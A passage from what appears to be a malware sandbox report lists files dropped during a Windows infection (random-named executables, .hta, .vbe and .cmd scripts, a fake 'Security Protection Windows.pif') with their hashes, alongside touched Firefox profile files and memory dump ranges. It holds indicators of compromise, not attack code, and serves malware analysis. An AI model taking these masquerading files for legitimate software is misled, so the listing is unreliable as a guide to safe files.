                                                      SHA512: 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp
                                                      Filesize: 23KB
                                                      MD5: 6f67e7c8e8d9da4ff1a137e362f4f1fc
                                                      SHA1: 913366e6930c542fede4ba3bb729ed50d8484af2
                                                      SHA256: 1e05205514eebe36102a18516d32ea516dcee64d31ec0a5991b4e7ffa2609116
                                                      SHA512: af48c78f03f76c45b81d2b394ce6e7d4f3022f737a914d4f5c22aa5233fd1f3e6f052c91f09ce56b252cf0b2ba3108297cdd4473ff196eee0946268070432ee9

                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                                                      Filesize: 15KB
                                                      MD5: 96c542dec016d9ec1ecc4dddfcbaac66
                                                      SHA1: 6199f7648bb744efa58acf7b96fee85d938389e4
                                                      SHA256: 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
                                                      SHA512: cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                    • C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe
                                                      Filesize: 1.8MB
                                                      MD5: 63fedcde6aa8f912dff90a919009eef9
                                                      SHA1: cdeb0899d4e8d42515009b3c7f61e94745a412c0
                                                      SHA256: f316d9102eac2c6267cab00f83303ec744fe397344aa142abf4b071d836d6ce1
                                                      SHA512: 846b195f497a1e2e127fb1fb249dcdcc374dc85ad0fd749a87cfc7d1e07ffe6548359e3a7f0d3bdd1191d4145a46d5272f92637be599c26705f90b2f60c1d853

                                                    • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
                                                      Filesize: 1.2MB
                                                      MD5: 5bdfc8ca0525eea734befa16da9e44c5
                                                      SHA1: 5c9f1c71a7969f4509beb3172371306bc7939b0d
                                                      SHA256: 75d8ef19654aa63e7d40dab5b3bf7022cdc27931848ef665052958286218f9d6
                                                      SHA512: 8c4ccee4afca962afe97fb89f93c1b467ce0275b5f6a3065a709ca3047fd3700dd789a2d426bfbe09666cacf29026b768c631658e131e07809ca8d2b018a96c7

                                                    • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
                                                      Filesize: 1.2MB
                                                      MD5: 9c19c2d6754fe7072a89aee0649a71da
                                                      SHA1: 7c059bb15495c9ba60dd51e2b4b26563ce5a3a14
                                                      SHA256: a5da7473facf9f770700794f9bcc18e0eac3798afc83960bd18eb4dfec94f935
                                                      SHA512: b7d10b0f080377111911a16c99edebe572b3314ee5d9b84d36595ad067f4b36a0baa19a6077f9bdf4063b197932729dce32746bca1b73c691d53e2e4ebe7d857

                                                    • C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe
                                                      Filesize: 506KB
                                                      MD5: 7cd44dfdd8ea0c997b623a3ea4df2c8a
                                                      SHA1: f20f1d7ae28cc47f29aeb4246883e39d51f56667
                                                      SHA256: 5b2502b17aeae4139788cb0caadc0d33dd685b072cdfb1f08653217df116b287
                                                      SHA512: 492f017c6a4d08f036fc19ffa9697c6ccd29e4957bc3db1a11fd0484e37714b34c15c0df85ab45039f6871d9862fc1dc124c7f05dd10e4fea0f3eaff68434bbd

                                                    • C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe
                                                      Filesize: 938KB
                                                      MD5: 52fe4ee45a54301563335f2bb4a967b8
                                                      SHA1: b922199bca7fb27d17ac35c27509e8efbacfb93c
                                                      SHA256: 21f1a8c725ab8b1265e168123069ea585348ff7f532cd07359bf5c7e1b762463
                                                      SHA512: b7a476dddd55f2af52f60da5997c05fcee38999e19290b8a5be73923b0a4dde784b4f5e02010a79ae6c056a02ba82b9406a871dd1e059e26fab3c448ff0efa67

                                                    • C:\Users\Admin\AppData\Local\Temp\10167650121\am_no.cmd
                                                      Filesize: 1KB
                                                      MD5: cedac8d9ac1fbd8d4cfc76ebe20d37f9
                                                      SHA1: b0db8b540841091f32a91fd8b7abcd81d9632802
                                                      SHA256:

                                                      5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

                                                      SHA512

                                                      ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe

                                                      Filesize

                                                      3.0MB

                                                      MD5

                                                      64070cf2aaf2299bebff52cdb8d7813a

                                                      SHA1

                                                      a07ed8ba63429bd9116d35f57cf39f13fb934ddd

                                                      SHA256

                                                      b599cd83e268946e51ebd109e4709d8493b3bebe4d3b260d0060c8fd1808c95d

                                                      SHA512

                                                      14a5b7e6f4160dc2ca84fc014067e049b69d348a188ddc2867397646a569579f31c49d8d66f5fbeeede7a6b060afa81cf5b0276e1d70e2adba2d4f27902d9e2f

                                                    • C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      32b368754628cc66bbb0cd7f2b755f1f

                                                      SHA1

                                                      09bdee9f87a987ad13f179276aa9c87c6aab9988

                                                      SHA256

                                                      ef43745d1cae12b7fff10db5c3fc05a65be745d8e04d6d751990b7dd067fb4bf

                                                      SHA512

                                                      54d7978715b69238b65a3e6139e8e6860833a2995f0631f61f38f919e9ef22ff1cff1ec435db27101ba3d2bb7150ac0ff0f65278601f609382788d4450fed35a

                                                    • C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe

                                                      Filesize

                                                      946KB

                                                      MD5

                                                      21517355ed4c0c2f5cd52d654a395c95

                                                      SHA1

                                                      84c2365c9ec601930a0ef8ae7100d600de39dd18

                                                      SHA256

                                                      55bd4390b4ca2d0946669464721368c4c2bdcc6702c6f4249190122696e213ec

                                                      SHA512

                                                      62e4321289f5d7e586896cd2fb79cea4019d29a839f02cdf48bcd62f7a5ad1ce6772a8691fc2e2206dc3b8a7cbeb67fc988b1d6eabbbc9997358d4035333dad6

                                                    • C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      c115b105b0af2914e32758ba35b500cb

                                                      SHA1

                                                      e99ccbbda548c73337ce1ed39d051fe53e27b109

                                                      SHA256

                                                      ca0b06d1df01e49d454b636fd2d89f65d40abbe1c73830d84f69515285877993

                                                      SHA512

                                                      f44183bceeef6060bc5ec6de6dae04529ec90b2e3e6ab48e5028bdea2dbede722800e5ce8c6539e0fb76ac42a8d0ef6093df9d11685f3febb0fb374bcdc199e6

                                                    • C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe

                                                      Filesize

                                                      723KB

                                                      MD5

                                                      800af5cafa597a540e79853b7de988de

                                                      SHA1

                                                      99e1e7a889badecacf7bf886384fede487b2d0fc

                                                      SHA256

                                                      570308cb38edcaf6080c397cf92ce2b5097a420187783249abae2a1463804c78

                                                      SHA512

                                                      44f0afa2d78830d3722c5ece89d8ba4a0520c00e80b27ba8190e8371766a4349cad2f90228cf71a8262aa3cd0cc0811968c19ad65467781c616dbdecce37d6f3

                                                    • C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe

                                                      Filesize

                                                      1.3MB

                                                      MD5

                                                      3a6133c0dcb1022dabfc8097e647005d

                                                      SHA1

                                                      8363041c751a7f71498eee081f6d5ad9f05e0899

                                                      SHA256

                                                      e6cac88e914a659e5a89de8453e7fb360c12a1e54e332d04c8e9bc9b6afc68d5

                                                      SHA512

                                                      6e4b00a5cd36c27f3ce3a889a516d84691182aa8f97e3ffbfdc9d0411104dff6103e2d99dff84bf0c698b07666c0d1f2acc320a6645d3d9c5787d79c55edf689

                                                    • C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe

                                                      Filesize

                                                      2.8MB

                                                      MD5

                                                      48c453a508cc0ad9fe35cb09c93caa45

                                                      SHA1

                                                      72326d7c7a51476714314e619459993cdf6712d6

                                                      SHA256

                                                      3a1185ce73cc0aea87fd69eb5aeab5612627e45faaa6f0ca1d10a2eb32424406

                                                      SHA512

                                                      f64ad51ab818c45e0681df9fce3fd64e6a09b736f83843e87e8d339cba851845c25e0925f263781f0e1b36a16ada32fb4447d69ac62274cb02fc3fdd55261679

                                                    • C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      b15f24cdc671e2185ee67fe778804d96

                                                      SHA1

                                                      ad4e1423cb6dd0221b8bff401bc378632e955740

                                                      SHA256

                                                      99ed4cd54b89fc06fbce99560a0275fc2933b0c908475ca3807c056d9697dc8e

                                                      SHA512

                                                      319cf0296d752d246fff628bd33b71b512c70ed4455accb385304d9c0efd0bdc34a81292b7d75fc75b5019e86a65aff623c2a1aa97c5253fa6fcfb630b1dafb8

                                                    • C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe

                                                      Filesize

                                                      1.8MB

                                                      MD5

                                                      e24b910f8718afb26bde8ce5f5ffa883

                                                      SHA1

                                                      76ff4f98db6d08a1c79687551f945736e00f7264

                                                      SHA256

                                                      a66a04897591b33acc614a7c08a18270f46b6ef062e720882acd61f6870fb773

                                                      SHA512

                                                      029b854889ce75de4176c639c526bba21b61367f8225ea639b7d00c5a177da36f27a1fd16ff572fa19ace8742437c96de0e8e3e8eda807966c1666d5eb8c180b

                                                    • C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe

                                                      Filesize

                                                      4.5MB

                                                      MD5

                                                      cb9adadbe48b7bc07ad67d0e27a26407

                                                      SHA1

                                                      e1652696ddb21e1b94853d2d4dc7e211cca4e1af

                                                      SHA256

                                                      5e17fd65c195b18d5bea19a4c3bd7d6146dc2ec5248c87784f1b2f3134055eb7

                                                      SHA512

                                                      21f22f2774ff159d420c3545128039dcec6b246796951969d4d153c1085e4d0ebd770f59e75da17aa3d0b41126aaaeb4eb36c2f6c7487a1a915212f37ea17238

                                                    • C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe

                                                      Filesize

                                                      364KB

                                                      MD5

                                                      9dd7f35baa732ab9c19737f7574f5198

                                                      SHA1

                                                      af2f9db558e5c979839af7fc54a9c6f4c5f1945c

                                                      SHA256

                                                      ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6

                                                      SHA512

                                                      ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91

                                                    • C:\Users\Admin\AppData\Local\Temp\OpenCL.pif

                                                      Filesize

                                                      236KB

                                                      MD5

                                                      34ab20a76646b53b692fd8fb5b28ae45

                                                      SHA1

                                                      9e7f6cc4c28394be5a331c92723cfd823143f639

                                                      SHA256

                                                      9656e3c51eb43af1264a080c76fa6c87f01950489adda30532b9cd317eb0b54c

                                                      SHA512

                                                      a172d81d867568d56e9146ebb7bbec6f08ab93f1414045e6c2aafcf72f45dedc20757d930d6e60f1c7dacab30a528c05422eb21d607e93f0760db9e1c8fb1268

                                                    • C:\Users\Admin\AppData\Local\Temp\Tar2488.tmp

                                                      Filesize

                                                      183KB

                                                      MD5

                                                      109cab5505f5e065b63d01361467a83b

                                                      SHA1

                                                      4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

                                                      SHA256

                                                      ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

                                                      SHA512

                                                      753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                                                    • C:\Users\Admin\AppData\Local\Temp\pack82.vbe

                                                      Filesize

                                                      1.0MB

                                                      MD5

                                                      862c18d9ae0274490abff6a542b8a3e9

                                                      SHA1

                                                      591e2c15f429355ad90c18aa70845342f3b6447d

                                                      SHA256

                                                      7138a648e83aaa97eb31b98c9bfc4e9ccacde6d192e4f9b517572fe11335a724

                                                      SHA512

                                                      9e5c1aa5fb6a6c0947bcba2a74e3c0d8691a4309c99bfba83928eebc44468af5b4b279f538516d9ed5d55a60feb630bb1356946adaec6981a170a4cb3b1a1f2c

                                                    • C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta

                                                      Filesize

                                                      717B

                                                      MD5

                                                      c1367c66f4a25a33a9e097d9f61ada54

                                                      SHA1

                                                      2b417f97e1a590f1ee031b18f9be9886cb21fe5a

                                                      SHA256

                                                      cb515f73d136c1601909a99fab0a333a16ff7e02bdda1ced1afd7690e4a9b7f7

                                                      SHA512

                                                      f48fe0625f0de7019d3d4b5e752eef9509756d7b76dce92c40cb9d4ba1d0ac23937fcaae56da02600d98dcddac7c3b4a3f3517b841fc122c88958da62daa2111

                                                    • C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta

                                                      Filesize

                                                      717B

                                                      MD5

                                                      2434d3670041a353c3989b66c2810f25

                                                      SHA1

                                                      e1b63652f81dc8127af6353a171ee5d12c24f5f6

                                                      SHA256

                                                      3a1547145af94d2b1ee8c5a023e3b32bc401c46756a368cf0cc39a1a269f6add

                                                      SHA512

                                                      3cf867459ac9c3bcd58c620c7f6a4f615053a5d28a922cf7c99e21d45a21dc28e9a14eebd5c9dd7eaad244e5fbf394d4eccbfab9102ed5f8e4659f946f979bf7

                                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                      Filesize

                                                      442KB

                                                      MD5

                                                      85430baed3398695717b0263807cf97c

                                                      SHA1

                                                      fffbee923cea216f50fce5d54219a188a5100f41

                                                      SHA256

                                                      a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                                      SHA512

                                                      06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                      Filesize

                                                      8.0MB

                                                      MD5

                                                      a01c5ecd6108350ae23d2cddf0e77c17

                                                      SHA1

                                                      c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                                      SHA256

                                                      345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                                      SHA512

                                                      b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                                    • C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe

                                                      Filesize

                                                      18KB

                                                      MD5

                                                      f3edff85de5fd002692d54a04bcb1c09

                                                      SHA1

                                                      4c844c5b0ee7cb230c9c28290d079143e00cb216

                                                      SHA256

                                                      caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131

                                                      SHA512

                                                      531d920e2567f58e8169afc786637c1a0f7b9b5c27b27b5f0eddbfc3e00cecd7bea597e34061d836647c5f8c7757f2fe02952a9793344e21b39ddd4bf7985f9d

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      2ec298d6d82f64ddf0bcd068555c2aec

                                                      SHA1

                                                      dcddea5ceec2b16b4f9d45d071deea46852cbdd1

                                                      SHA256

                                                      f18d8204aeee392ad4897d5391ca416902336477890b88416e76c83a50265a9a

                                                      SHA512

                                                      cb05f53e4e45280f280e4fb7302c489780e6ec68cd6f7e68b79f1fd327468a7484823de398ac321083aea5860dca56a777cf4cf829d99cb46b282cf863daa408

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      6fd9f58421e79a16a5ba1edd85f4e7e6

                                                      SHA1

                                                      824443edb374f0f45abff866e795ede1ecd7e557

                                                      SHA256

                                                      081a4904eec27cad3c4446ab7341cba0e2bdab310226099fd9884ef68b6e1b6c

                                                      SHA512

                                                      cbd060514ba4ea0fc269ab610fd210d680b372c75d3e633272ba0efc105dec4fd44816d2816fb359772e3c4db1f6a57b5ba24abf0c4211aaad39fa4e80ed9ba8

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      65b53db2574e394595cb4fdaaec6f966

                                                      SHA1

                                                      7d386887c471f7dffe56534ad026bcf0641a2585

                                                      SHA256

                                                      d65d3c9f396d73541d5acd96dc4e0d8b41fd305ff753efad381ea28baa633f9b

                                                      SHA512

                                                      424d9d36702a76b0d2af69293de6d75504c1d5ec07bce9478388ce4a498b0558cad331aa53f2c5ff0522f1ff91677919bc0dfe283b1f6cfca1b833331892ce1b

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      9bbdbef001aa9094d00dce68fe769021

                                                      SHA1

                                                      678feba5fea7b4b708fc460adff6ec9457fcc582

                                                      SHA256

                                                      32af4e107a2e6570ff75db8a025ab8189f25b4dce140b0d3555be5a4de5bb190

                                                      SHA512

                                                      4c1d9ce43897715e83746dc7ddf558e7d8897cb4b375b6de07e5f209c7a31cc0ede8b41858182cefe769bd59251d8c7f31406fe7074d7d95530d1ffbe460890b

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\abf917a2-da53-45d7-b5de-ed463386c065

                                                      Filesize

                                                      10KB

                                                      MD5

                                                      56c7cbd2cb0ad9b0c942794c8e885500

                                                      SHA1

                                                      f894976a9f4fd21f18c9413ab89e8a07fdf62d80

                                                      SHA256

                                                      bbe34c9b0278882ba7f4c5a9aef8b06d021c07f05cedc860e3d0bf9af607e263

                                                      SHA512

                                                      fc983540fc8256526418954b0439b7a6b2c93d57083bb88961ab4e9eca11fb4b07a29bc88285d0fbb1b301b5c9ead367f0107215c5c84b56f05e6f2924ecb02a

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\ee979735-ab7a-4d29-9657-67cf17206b9d

                                                      Filesize

                                                      745B

                                                      MD5

                                                      28e386eb459104aa7208e2a4a9a6de34

                                                      SHA1

                                                      42cffc5158eddef794aba0cfce509be433843819

                                                      SHA256

                                                      a42b5daffcdc55002093fb7d0d80aeffdf154d223763389e615910a216e8cf2e

                                                      SHA512

                                                      23727d19b530f5af56ebf17f4ee8b6c41b9199c7eb1f6ca4f6c565205ee99a8a0d10f74376e5e6aa007324c85f2a979742c5c01160672e8d8f3fad038a348691

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                                                      Filesize

                                                      997KB

                                                      MD5

                                                      fe3355639648c417e8307c6d051e3e37

                                                      SHA1

                                                      f54602d4b4778da21bc97c7238fc66aa68c8ee34

                                                      SHA256

                                                      1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                                                      SHA512

                                                      8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                                                      Filesize

                                                      116B

                                                      MD5

                                                      3d33cdc0b3d281e67dd52e14435dd04f

                                                      SHA1

                                                      4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                                                      SHA256

                                                      f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                                                      SHA512

                                                      a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                                                      Filesize

                                                      479B

                                                      MD5

                                                      49ddb419d96dceb9069018535fb2e2fc

                                                      SHA1

                                                      62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                                                      SHA256

                                                      2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                                                      SHA512

                                                      48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
  Filesize: 372B
  MD5: 8be33af717bb1b67fbd61c3f4b807e9e
  SHA1: 7cf17656d174d951957ff36810e874a134dd49e0
  SHA256: e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
  SHA512: 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
  Filesize: 11.8MB
  MD5: 33bf7b0439480effb9fb212efce87b13
  SHA1: cee50f2745edc6dc291887b6075ca64d716f495a
  SHA256: 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
  SHA512: d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
  Filesize: 1KB
  MD5: 688bed3676d2104e7f17ae1cd2c59404
  SHA1: 952b2cdf783ac72fcb98338723e9afd38d47ad8e
  SHA256: 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
  SHA512: 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
  Filesize: 1KB
  MD5: 937326fead5fd401f6cca9118bd9ade9
  SHA1: 4526a57d4ae14ed29b37632c72aef3c408189d91
  SHA256: 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
  SHA512: b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js
  Filesize: 7KB
  MD5: aaf5c83bce7bbbf3a9ed4aa0d03efaf5
  SHA1: 4c8952135132981739df5b7c2d6480e3d7d43205
  SHA256: 66efdd7ec3fa7bb252fb2e0ce9ce0515cb45dc883cb08df2993640b2e0f47876
  SHA512: 5ae1c0bd932dc14aca7812f8acb6bee07e54f585f3b7fc381db63c3f385d9ecdde710d7ea0e64b341d76c80fd18b266f482e5e39a7434e1cc290a344e5d6dcbe

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js
  Filesize: 6KB
  MD5: f3e0243e794aff442ce61ceef100a1bf
  SHA1: 6910ed8bd903193fce4402c98b6fcde78f2b7d33
  SHA256: e08206111f17853ceba18945e09e190f4f22ca4c899aa21489d725c1bf399ea2
  SHA512: 9e5baa0f6d057ced61565eeb46ab2d78ebf16b04d47e241ee696c800324ef6a993784544890a6292f18724dde4da62d0373e35ecb78fd812135d7dd92f1414e1

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
  Filesize: 4KB
  MD5: 755a812a94fcb2923b363fcc39e27f52
  SHA1: e9100c4b39b724ad9c25535518e410d00ff65e77
  SHA256: 759d5c026a67ec00f10bbd75df859fc0874867d0a89f19caacbbb045ee52a009
  SHA512: 69f4c15f44e594101632ae32ec3f12064eed3883a8bcd2eaa3dffa0c6a141f8d533c32cd32a032c87bcea3a88b56471754195447fdf1a9b90b22a60c63c2bdd7

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
  Filesize: 184KB
  MD5: bece0acf9d7f19d01c7943c54d2ad372
  SHA1: aef59ca4b0fe97f32db128e103bfb98aee3b5e29
  SHA256: ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
  SHA512: 105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b

• C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe
  Filesize: 526KB
  MD5: 8ff8554b369f49ab17c0c588dccc7c41
  SHA1: 701061a9a9ed8674587bfc51d8bcbf9ebf893c1b
  SHA256: ac0655d5bccf2669297a08564c1c98f428bbda7e5a4d7bb5215fef06b23e9881
  SHA512: 8380c30f664b4c28334db1d315dbb62ef4bdc6a190c29d0f79eb2e2baed5bc8f5c3ff0c5ea3421026b97c58dd53144e684d124118edba456d11e1368b54b036a

• \Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
  Filesize: 1.8MB
  MD5: 09e83a87eb8606e9f84a6a78349a615a
  SHA1: d294d80666e04fb6229ed8c0d849ccce2ebbf881
  SHA256: dc274be4181801a3b27036514f89ca8afc964930ba57afc5f99e86b4deff4b79
  SHA512: b1d6bb5e1e7ec84afe40d41ed0df31e2b0d74167d784581513a3bcbc7943742bd4ef9706bf2f691315ecfb57a1475d21077ebbc5eff9d1c5f29f6475b5dd717c

• \Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
  Filesize: 1.3MB
  MD5: 08cff083585794c9ce26585faa7c8df4
  SHA1: c9aed53641e8f36e9a590af5c62ba434f9d4203a
  SHA256: 9d61713812b8af616f33f88f5fb8ba98bbdef9ab5e33229d402a4ba4e6974e97
  SHA512: f76cbd115ebec6b00fe04bc2029d33552bfda7d4f909543e37787804f2279cc3f8f5234215192c1a74102a772a9806a0fccc7a05b4e1aeec7ddacd7c084c85ba

• memory/352-243-0x00000000008D0000-0x0000000000D84000-memory.dmp
  Filesize: 4.7MB
• memory/352-245-0x00000000008D0000-0x0000000000D84000-memory.dmp
  Filesize: 4.7MB
• memory/1092-286-0x0000000000800000-0x0000000000CA6000-memory.dmp
  Filesize: 4.6MB
• memory/1092-300-0x0000000000800000-0x0000000000CA6000-memory.dmp
  Filesize: 4.6MB
• memory/1092-198-0x0000000000800000-0x0000000000CA6000-memory.dmp
  Filesize: 4.6MB
• memory/1092-754-0x0000000000800000-0x0000000000CA6000-memory.dmp
  Filesize: 4.6MB
• memory/1132-187-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-338-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-222-0x0000000006400000-0x000000000669C000-memory.dmp
  Filesize: 2.6MB
• memory/1132-49-0x0000000006B60000-0x0000000006FFC000-memory.dmp
  Filesize: 4.6MB
• memory/1132-179-0x0000000006400000-0x000000000669C000-memory.dmp
  Filesize: 2.6MB
• memory/1132-178-0x0000000006400000-0x000000000669C000-memory.dmp
  Filesize: 2.6MB
• memory/1132-50-0x0000000006B60000-0x0000000006FFC000-memory.dmp
  Filesize: 4.6MB
• memory/1132-324-0x0000000006400000-0x0000000006708000-memory.dmp
  Filesize: 3.0MB
• memory/1132-323-0x0000000006400000-0x0000000006708000-memory.dmp
  Filesize: 3.0MB
• memory/1132-126-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-34-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-285-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-721-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-33-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-31-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/1132-221-0x0000000006400000-0x000000000669C000-memory.dmp
  Filesize: 2.6MB
• memory/1132-410-0x0000000006400000-0x0000000006708000-memory.dmp
  Filesize: 3.0MB
• memory/1132-125-0x0000000006B60000-0x0000000006FFC000-memory.dmp
  Filesize: 4.6MB
• memory/1132-1030-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
